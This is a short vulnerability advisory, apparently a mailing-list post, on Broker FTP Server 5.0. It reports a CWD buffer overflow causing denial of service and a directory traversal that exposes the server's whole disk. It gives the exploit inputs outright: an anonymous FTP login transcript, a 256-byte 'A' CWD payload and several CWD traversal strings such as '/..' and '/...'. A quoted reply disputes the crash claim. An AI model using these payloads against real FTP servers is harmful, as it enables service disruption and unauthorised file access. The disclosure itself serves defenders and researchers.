Product : Broker FTP Server
Version : 5.0
OSystem : Windows
Authors : TransSoft
WebSite : http://www.ftp-broker.com
Problem :
* Buffer Overflow in field CWD
* Access to all files on a disk

#[Denial of Service]#

Description:
------------

eng:
====
To arrange overflow in field CWD, necessary to send on it more than 256
bytes of dust.
After that server will fall, and will not submit any life attributes.

Exploit:
--------
*************************************
>>Telnet 127.0.0.1:21
220 FTP Server Ready [***]
>>USER anonymous
331 Password required for anonymous.
>>PASS anonymous@localhost
230-Welcome to Broker FTP Server.
230-
230 User anonymous logged in.
CWD AAAAAAAAAAA......AAAAA [256b]
*************************************


#[Access to all files on a disk]#

Description:
------------

rus:
====
За счет этой уязвимости вы можете получит&#11
00; доступ ко всем файлам на
жестком диске сервера
eng:
====
Due to this vulnerability you can get access to all files on a hard drive
of the server
Exploits:

Current Directory : "/"
CWD *
CWD /*
CWD /..
CWD /...
CWD /.../

Contacts:
---------

r2subj3ct@dwclan.org
subj.24h.to (www.dwcgr0up.com/subj/)
www.dwcgr0up.com
irc.dwcgr0up.biz #dwc

Thanks:
-------
DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies
DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.

subj wrote:
> Product : Broker FTP Server
> Version : 5.0
> OSystem : Windows
> Authors : TransSoft
> WebSite : http://www.ftp-broker.com
> Problem :
> * Buffer Overflow in field CWD
[snip]
> To arrange overflow in field CWD, necessary to send on it more than
> 256 bytes of dust.
> After that server will fall, and will not submit any life attributes.

Tested on brokerftp 5.0 on win2ksp3, unconfirmed. The current session will
indeed hang, but no access violation or the likes, and the server still
answers new session initialisations?. Various bufferlengths tried, your 256
and up ti appx. 4000.

--
Knud Erik Højgaard